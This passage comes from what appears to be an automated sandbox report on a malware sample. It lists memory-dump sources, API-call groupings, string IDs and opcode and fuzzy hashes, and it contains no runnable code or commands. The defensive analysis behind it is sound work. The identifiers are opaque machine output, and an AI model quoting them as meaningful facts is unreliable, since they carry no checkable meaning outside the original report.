                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                    • String ID: SCRIPT
                    • API String ID: 3051347437-3967369404
                    • Opcode ID: d5206061f2b3ac5e17ee2dd1b5fd8c27282f55e584baf03c5003c8e6f72eae5e
                    • Instruction ID: ed471db001c9b2b738268b7dee3a1973d1558ed07d3ca089c67aebf0da893452
                    • Opcode Fuzzy Hash: d5206061f2b3ac5e17ee2dd1b5fd8c27282f55e584baf03c5003c8e6f72eae5e
                    • Instruction Fuzzy Hash: E0213D76709B9182EB108F22E858A2973A0FB99F86F045135DE8E87B55DF3DE845C700
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Process$CurrentInfoSystemVersionWow64
                    • String ID:
                    • API String ID: 1568231622-0
                    • Opcode ID: 79e0420c2984852e5f59fe1e813506d9fafb4aaa62b9c0ac84c7f4c88eda00f4
                    • Instruction ID: 0074123b98f7c734344d78f77d7c4d908f1bed270925effb95e90943f92c9f21
                    • Opcode Fuzzy Hash: 79e0420c2984852e5f59fe1e813506d9fafb4aaa62b9c0ac84c7f4c88eda00f4
                    • Instruction Fuzzy Hash: 5EC16AA1E0E3D286E6B18F10AC805752B54EF11FC6F8450B5D4CEC26A7EF6CAD09C792
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: _get_daylight$_isindst$_invalid_parameter_noinfo
                    • String ID:
                    • API String ID: 1405656091-0
                    • Opcode ID: 3e809ee0917d980967337eb290ae9f657cbcc700f628c2feb101ff6f2151edd5
                    • Instruction ID: 242852b1eeab442145334e6069419bce74786186c0efa1eeda1d59e4cb4e813f
                    • Opcode Fuzzy Hash: 3e809ee0917d980967337eb290ae9f657cbcc700f628c2feb101ff6f2151edd5
                    • Instruction Fuzzy Hash: 488108B2F066564BEB589F35CD017B92295EB54F8AF449035DA4DCABCAEF3CE9018700
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: __std_exception_destroy
                    • String ID: value
                    • API String ID: 2453523683-494360628
                    • Opcode ID: f81553ad2a7cfe65359a8641e8f11d870ae009f2dc06bb8eea9cb3bba749b6e5
                    • Instruction ID: 2606dfaca1040efece6fff69092142415653d69e93635538add520a45cb0665c
                    • Opcode Fuzzy Hash: f81553ad2a7cfe65359a8641e8f11d870ae009f2dc06bb8eea9cb3bba749b6e5
                    • Instruction Fuzzy Hash: 1522B072A25BC095FB10CB78D8A83ED6760EBA57A4F105311EEA957AD9EF78C1C5C300
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                    • String ID:
                    • API String ID: 1239891234-0
                    • Opcode ID: c1a2dea820685187a1b1ee23aeb9defc365f229fa0d1b3730a4ebbe8088e0426
                    • Instruction ID: 123261ba96e220a3fc3b257ca58394faad833a9ab104e94a89d58adb93828d5f
                    • Opcode Fuzzy Hash: c1a2dea820685187a1b1ee23aeb9defc365f229fa0d1b3730a4ebbe8088e0426
                    • Instruction Fuzzy Hash: 47317136609B8186DB60CF25EC442AE73A4FB88B55F544135EACD87B9ADF3CC955CB00
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                    • String ID:
                    • API String ID: 1239891234-0
                    • Opcode ID: c9e504c59835c2d35db1ffb066554be7349a78dbc61e2df5faf9e46e7f6c12d1
                    • Instruction ID: 3d31de7b2b3f2a49b288bf4d46aecd12dcf747c7f61e380e3a26abba1ea516f4
                    • Opcode Fuzzy Hash: c9e504c59835c2d35db1ffb066554be7349a78dbc61e2df5faf9e46e7f6c12d1
                    • Instruction Fuzzy Hash: FD315E36215B8096FB60CF25E8683DE73A4F798758F500516EE9D47BA8EF38C5868B00
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: AsyncState$ClientCursorScreen
                    • String ID:
                    • API String ID: 4210589936-0
                    • Opcode ID: 212ea22fed56076fe4411d7c93cd1191e07a29710201a96bd61674af69d79e6f
                    • Instruction ID: 50dc5b28f8df6f84f2fb5b034b4aa15cb89d29ef55e140d02251ddc43c90db77
                    • Opcode Fuzzy Hash: 212ea22fed56076fe4411d7c93cd1191e07a29710201a96bd61674af69d79e6f
                    • Instruction Fuzzy Hash: 3351C332B0A6A28BE758DF35CD4056AB764FB45B95F100235FEAD83B95CF38E8518700
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: _handle_error
                    • String ID: !$VUUU$fmod
                    • API String ID: 1757819995-2579133210
                    • Opcode ID: 06f58ab4aaca2128c338277b14f38b089639c2a9de57a5825e67876a1165aa04
                    • Instruction ID: b2082f6366f2b2a7daac2909ecb180c4e93d48d8fe3427426e3f71aa306604af
                    • Opcode Fuzzy Hash: 06f58ab4aaca2128c338277b14f38b089639c2a9de57a5825e67876a1165aa04
                    • Instruction Fuzzy Hash: CDB1FA11E1DFD445DAB38E3454113B6B259AFAA7D1F10C332E99EB5BA4DF2CA882D700
                    APIs
                    • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6C58B2BF0
                      • Part of subcall function 00007FF6C58AAF34: GetCurrentProcess.KERNEL32(00007FF6C58AB0A5), ref: 00007FF6C58AAF61
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: CurrentProcess_invalid_parameter_noinfo
                    • String ID: *$.$.
                    • API String ID: 2518042432-2112782162
                    • Opcode ID: 4bc727eecd12c05f0579dc3a47633661258e4e13a894efe955ef075ebd1ec7be
                    • Instruction ID: d1b8beeca82f3cb1b7ee31617babc78063762b3b7b4b78655dc2b6899dbc6e36
                    • Opcode Fuzzy Hash: 4bc727eecd12c05f0579dc3a47633661258e4e13a894efe955ef075ebd1ec7be
                    • Instruction Fuzzy Hash: 3E51E062F16A6585FB10EFA69C101BD23A8BB44FC9F544536CE9E97B89DE3CD8428300
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: FolderPath
                    • String ID: ]\pi$mamm$rate
                    • API String ID: 1514166925-3197131006
                    • Opcode ID: b03a9b0c19f4d780f5b75ec5b43a21253624ffa7b6e2cf36b45fb0c6f46de5d0
                    • Instruction ID: a294e16c9843ad9da02f82f4f106a07ea9359068f43c042df84a0e1588cb28ba
                    • Opcode Fuzzy Hash: b03a9b0c19f4d780f5b75ec5b43a21253624ffa7b6e2cf36b45fb0c6f46de5d0
                    • Instruction Fuzzy Hash: E8518E72A18BC085E710CF65E8643EA7360F7E9798F149311EB9D17A9AEF78C2D48740
                    APIs
                    Strings
                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FF6C5895AC3
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: DebugDebuggerErrorLastOutputPresentString
                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                    • API String ID: 389471666-631824599
                    • Opcode ID: 8c783dfea8ab590eafe6bbf95db9fdce1a8e48e032f2d75969754b32e98ee1d6
                    • Instruction ID: b3848c1bb8de7ee4bc47ab4adef06467c3d8a1c26d0eb51e56ffe98b9413b61c
                    • Opcode Fuzzy Hash: 8c783dfea8ab590eafe6bbf95db9fdce1a8e48e032f2d75969754b32e98ee1d6
                    • Instruction Fuzzy Hash: 7B113D32615B9296E7449F22DE553B933A4FF44B56F404135C68DC2A96EF3CE868C710
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                    • String ID:
                    • API String ID: 1083639309-0
                    • Opcode ID: b4230e9694d6db5a2454d9ccaa2f058036f57f1eebbf8966ac4aac68c055cdad
                    • Instruction ID: 2859ed5f52976f3990afc5d2f622983c8d3d1d4e9edd51058485420d9c63bb43
                    • Opcode Fuzzy Hash: b4230e9694d6db5a2454d9ccaa2f058036f57f1eebbf8966ac4aac68c055cdad
                    • Instruction Fuzzy Hash: 8B418026A1A6A291E710EF21EC445BE6760FB94F85F945032EACE83756DFBCE905C700
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                    • String ID:
                    • API String ID: 2933794660-0
                    • Opcode ID: 365799cee272a9e49a7a65d00c220567e811fc46e1a8c34076cb77dca232685e
                    • Instruction ID: 9afa1b57330a5f02fa3758b92d032932bc31d1562bccc3b1517921dcbe6c9911
                    • Opcode Fuzzy Hash: 365799cee272a9e49a7a65d00c220567e811fc46e1a8c34076cb77dca232685e
                    • Instruction Fuzzy Hash: 7B111C36711B009AFB00DB60E8683E933A4F729758F441E21EE6D867A4DB78C19A8340
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: AllocateCheckFreeInitializeMembershipToken
                    • String ID:
                    • API String ID: 3429775523-0
                    • Opcode ID: 788e580e6745dde0bf41f1c5252257a7cd520450013a93ceb3609c7d43dd0201
                    • Instruction ID: 7726c5af3dc3ead9016802fbfadc93267ede3582e14851095ae26886d1821fce
                    • Opcode Fuzzy Hash: 788e580e6745dde0bf41f1c5252257a7cd520450013a93ceb3609c7d43dd0201
                    • Instruction Fuzzy Hash: 900140736247818FE7108F20E8593A933A0F75476FF400929E64D86A99CF7DC158CB84
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: InfoLocale
                    • String ID: GetLocaleInfoEx
                    • API String ID: 2299586839-2904428671
                    • Opcode ID: 4c9146b6bf86597406d6de9f903d4b6e640457e4a93c8986bcbf77083a3afc0a
                    • Instruction ID: 58c7614d9e48e23bf74ec3e7976cbe0ab5b009671ec3111f3543509caab124dc
                    • Opcode Fuzzy Hash: 4c9146b6bf86597406d6de9f903d4b6e640457e4a93c8986bcbf77083a3afc0a
                    • Instruction Fuzzy Hash: 7B01D635300B80A5F7408B56F4386DAA7A0EBB8FE0F5844269E4913B69CE38C5C3C340
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: ErrorFormatLastMessage
                    • String ID:
                    • API String ID: 3479602957-0
                    • Opcode ID: 9b3400b2d7958dcf7bb5d83233e54855c88d8e6a6dc818cc5e4bd19195bd4ddd
                    • Instruction ID: 5d200f1fd395d9101466a82ac86c7a0f302816554c0f156d1329cf1bb4e9fdb0
                    • Opcode Fuzzy Hash: 9b3400b2d7958dcf7bb5d83233e54855c88d8e6a6dc818cc5e4bd19195bd4ddd
                    • Instruction Fuzzy Hash: C0F0A42170868241E7209F25FC4476AA265FF88B91F108230EBDD82BAADF3CD8448B04
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: ErrorLast$EnumLocalesSystemValue
                    • String ID:
                    • API String ID: 3029459697-0
                    • Opcode ID: 80b9f8f0eff9f381ffb858e47286a2614544a4ae9f2f5ac581fd68414b33c0fc
                    • Instruction ID: 5ea9772f1c76e1ddd674952a7a47f28c576869edc8ede931a02f92dae8950230
                    • Opcode Fuzzy Hash: 80b9f8f0eff9f381ffb858e47286a2614544a4ae9f2f5ac581fd68414b33c0fc
                    • Instruction Fuzzy Hash: E111E1B3A04644DAFB14AF26D0A47E87BE1F3A4BE1F448115DA26833C4CA74C6D2C750
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: ErrorLast$EnumLocalesSystemValue
                    • String ID:
                    • API String ID: 3029459697-0
                    • Opcode ID: 42e42687f5c50c62cb49a7e3ae48be6ccfbac4299658b74d6e3400739adc2ed5
                    • Instruction ID: 7ef3b43531945cd9daebcf968c9cf937757d2073720e493a7c745b9b3d8f0213
                    • Opcode Fuzzy Hash: 42e42687f5c50c62cb49a7e3ae48be6ccfbac4299658b74d6e3400739adc2ed5
                    • Instruction Fuzzy Hash: 010124F270438096F7106F25F4787D976E1E7A0BA1F418222DA31073C8DB7485C2CB00
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: EnumLocalesSystem
                    • String ID:
                    • API String ID: 2099609381-0
                    • Opcode ID: a1cc8749853157851109651033536a3933ca55c2c0cd0e25aac1eff4f86ef32d
                    • Instruction ID: e8a519bb0ce5c1ef4676dd5423eb25d35a0c5d8a385cb37d14ca18ad6fe2411b
                    • Opcode Fuzzy Hash: a1cc8749853157851109651033536a3933ca55c2c0cd0e25aac1eff4f86ef32d
                    • Instruction Fuzzy Hash: 17F019B6200B4092F754EB65F8B42DA33A5F7A97C0F189025EE5993365DE3CC4A2C740
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: ContextCryptRelease
                    • String ID:
                    • API String ID: 829835001-0
                    • Opcode ID: 1733e94d0ffd1f5b69c1596078f7f5ded00b0d8dd025816a24b1372a8426e6e5
                    • Instruction ID: b966bb594269fe80ad948587df88320d4c7e6b4ed561a7f29c4710e9bc500e5d
                    • Opcode Fuzzy Hash: 1733e94d0ffd1f5b69c1596078f7f5ded00b0d8dd025816a24b1372a8426e6e5
                    • Instruction Fuzzy Hash: BCD09E31A25A4491EB44DB1AE4A434967A1F7D4B41F809011EA4D43764DE38C496CB00
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6e7bf95b57a972494f7e677b83735c9208e384b02d65c48a2ba5b0edec11da3a
                    • Instruction ID: a06f63f5fdb4ac81de6f18cb5ae04ffa16689fd1020ed2cf369b09d9f550921f
                    • Opcode Fuzzy Hash: 6e7bf95b57a972494f7e677b83735c9208e384b02d65c48a2ba5b0edec11da3a
                    • Instruction Fuzzy Hash: B72147F744EAC41BF3934E78997E2DB3F90E771E04F1E8056DA80491C7A52994879641
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e058122a449c3bc0fb019550bab4e213ee000eaae5b05e9141bc20034f926791
                    • Instruction ID: 4ad52bf4383d698ef9f328d6a3ae7c416ecbd6e810b78e3e09859c348c816908
                    • Opcode Fuzzy Hash: e058122a449c3bc0fb019550bab4e213ee000eaae5b05e9141bc20034f926791
                    • Instruction Fuzzy Hash: ED2161BB54EAC45AF3934E785C7E2CB3F90E7B5E00F5E805ACB80461C3A17958879651
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: dbc9e2954dff7354c133cdcf5da47f837c267d12aafacb9abd6d582a26f50de4
                    • Instruction ID: 3b11ab3f311c7a7741bf023a3322979605bf8460b4a52033c89771692e075733
                    • Opcode Fuzzy Hash: dbc9e2954dff7354c133cdcf5da47f837c267d12aafacb9abd6d582a26f50de4
                    • Instruction Fuzzy Hash: 5F2153BB44EAC45AF3934E789C7E2CB3FA0E775E00F19805ADB80461C3A13958879652
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2eac61d6d270c60210251688f737f4978352fd6a3a2b20f3312eff1ae6cab5eb
                    • Instruction ID: e3a5df7a0efafb44092dec8a5ff0db56ceb363ae7366a155032eb2240c1c4672
                    • Opcode Fuzzy Hash: 2eac61d6d270c60210251688f737f4978352fd6a3a2b20f3312eff1ae6cab5eb
                    • Instruction Fuzzy Hash: 2E1133BB44EAC41AF3934E789D3F2CB3ED0E775E04B1A805ADB80461D3D17958479652
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 487ac93962f4c08a726fa4f1cbcf22742163b5770d24f742e327d9c4be1ea4b1
                    • Instruction ID: 459d5a8dffd6218b7b61dc64699dca82bafa80113877d461396739e26fda10ff
                    • Opcode Fuzzy Hash: 487ac93962f4c08a726fa4f1cbcf22742163b5770d24f742e327d9c4be1ea4b1
                    • Instruction Fuzzy Hash: CEF044B16392958AEB94CF2DA8426297790E708791B90817DDAC9C3A44DE3C94618F04
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
